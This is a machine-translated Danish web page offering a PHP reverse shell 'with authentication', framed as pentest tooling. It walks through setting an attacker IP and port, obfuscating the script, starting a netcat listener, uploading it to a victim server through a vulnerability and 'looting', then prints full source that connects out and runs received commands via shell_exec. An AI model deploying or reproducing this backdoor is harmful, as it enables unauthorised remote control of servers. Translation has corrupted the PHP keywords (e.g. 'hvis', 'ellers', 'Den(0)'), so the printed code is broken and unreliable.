Omvendt Shell v1.0 PHP – Authentication Feature
Produkt ved:
Ashfaq Ansari
Version:
1.0
Pris:
Free

Anmeldt af:
Rating:
5
On Oktober 9, 2012
Sidst ændret:Januar 18, 2013

Resumé:

Reverse Slut PHP Shell med indbygget authentication funktion. Awesome script til at beskytte din bagdør.

Indledning

 

Dette værktøj er designet til pentest situation, hvor du har upload adgang til en webserver, der kører PHP.
Upload dette script til et sted i web roden derefter køre den ved at åbne relevante URL i din browser. Scriptet vil åbne en udgående TCP-forbindelse fra webserveren til en vært og port er defineret i scriptet. Bundet til dette TCP-forbindelse vil være en shell.
 

Dette vil være en ordentlig interaktiv shell, hvor du kan køre interective programmer som Telnet og SSH.
Denne shell har en indbygget authentication funktion, som forhindrer andre i at misbruge din bagdør.
Den adskiller sig fra web form-baseret skal, som tillader dig at sende en enkelt kommando, derefter returnere dig output.
 

Rediger kilden

 

1
2
3
$ip = "127.0.0.1"; #Ændre dette til din offentlige IP
$port = 4444;      #Ændre dette til din Port
$adgangskode = base64_decode("aGFja3N5c3RlYW0="); #Standard password: hacksysteam (MD5)

 

Skift værdierne som pr dine behov og situation,.
 

Obfuscate The Source

 

Når du har gjort ændringen, kan du bruge enhver online PHP Obfuscator at kode PHP script.
 

Eksempel: http://www.codeeclipse.com/
 

Før obfuscating, du ændre ovennævnte værdier efter dine behov.
 

Opsætning netcat Listener

 

Start en netcat lytteren med på en vært og port, der vil være tilgængelige for webserveren.
Bruger den samme port her som du har angivet i omvendt shell script for eksempel (4444):
 

1
root @ bt:~ # nc -lvvp 4444

 

Upload The Script og udføre det

 

Brug af sårbarhed opdaget af dig på hjemmesiden, upload reverse_shell.php.
Kør scriptet simpelthen ved at gå til den nyligt uploadede fil i din web browser.
 

1
http://<Victim IP>/<Upload Sti>/reverse_shell.php

 

Bemærk: Du vil ikke se noget output på websiden, det fortsætte i vente tilstand, hvis dens vellykkede.
 

Loot med din shell

 

Source Code

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
###################################################
#               Reverse Shell v1.0 #
#             Authentication Feature #
#                                                 #
#            Hacksys Team - Panthera #
#             Forfatter: Ashfaq Ansari #
#            hacksysteam@hotmail.com #
#          http://hacksys.vfreaks.com #
#              Designed for Linux #
#             Thanks to lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('Max_execution_time',0);

$VERSION = "1.0";
$ip = "127.0.0.1"; #Ændre dette
$port = 4444;      #Ændre dette
$adgangskode = base64_decode(&quot;aGFja3N5c3RlYW0="); #Standard password: hacksysteam (MD5)

$banner = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __/ |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | »_` _ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Reverse Shell in PHP
    Forfatter: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com /\n\n"
);

$pwd = shell_exec("Pwd");
$sysinfo = shell_exec("Uname -a");
$id = shell_exec('Id | cut -d "(" -f 2 | cut -d ")" -f 1 ');
$dato = shell_exec(Dato "");
$kun = 1337;
$info =
("
System Information:\n$sysinfo
Aktuelle arbejdsmappe: $pwd
User Group: $id
Aktuel dato og klokkeslæt: $dato\n
"
);

print "\nForsøger at oprette forbindelse til: $ip på port $port ...\n\n";

$sockfd = fsockopen($ip , $port , $errno, $errstr );

hvis($errno != 0)
  {
    print "\n****** Fejl Hændte ******\nFejl nNumber: $errno\nFejl String: $errstr\n\n";
    Den(0);
  }
ellers hvis (!$sockfd)
  {
    print "Fatal : En uventet fejl blev opstod, når de forsøger at forbinde!\n";
  }
ellers
  {
    print "Forbundet til: $ip på port $port ...\n\n";
    fputs ($sockfd , $banner);
    fputs($sockfd ,"Enter Password: ");
    $getpass = trim(fgets($sockfd, strlen($adgangskode) + 2));

    hvis ($getpass == $adgangskode)
    {
      fputs($sockfd, "\nAuthentication Successfull..\n");
      fputs($sockfd, $info);
      mens(!EOF($sockfd))
      {
    $cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $kommando = trim(fgets($sockfd, $kun));
        hvis (trim($kommando) == "Exit")
    {
      fputs($sockfd ,"\nAfbrudt af bruger ... Afslutter ..." );
      fclose($sockfd);
      Den(0);
    }
    fputs($sockfd , "\n" . shell_exec($kommando) . "\n");
      }
      fclose($sockfd);
      Den(0);
    }
    ellers
    {
      fputs($sockfd ,"\nUgyldig adgangskode ... Afslutning ...");
      fclose($sockfd);
      Den(0);
    }
  }
?>

 

Screenshot

 


 

Hent Reverse Shell v1.0 PHP – Authentication Feature

 

Reverse_Shell_v1.0.zip

 
 
 

21,000 samlede antal visninger, 8 visninger i dag

De følgende to faner ændre indhold under.

Ashfaq Ansari

Sikkerhed Forsker
Ashfaq Ansari er grundlægger af HackSys Team opkaldt kode "Panthera". Han er en sikkerhed forsker med erfaring i forskellige aspekter af Information Security. Han har forfattet "HackSys Extreme Sårbar driver" og "Shellcode of Death". Han har også skrevet og udgivet forskellige hvidbøger om software udnyttelse lavt niveau. Hans centrale interesse ligger i "Low Level Udnyttelse", "Reverse Engineering", "Program Analysis" og "Hybrid fnugdannelse". Han er en fanboy af kunstig intelligens og Machine Learning. Han er kapitlet føringen null Pune.

Seneste indlæg af Ashfaq Ansari (se alle)

Efterlad et svar

Din e-mail adresse vil ikke blive offentliggjort. Krævede felter er markeret *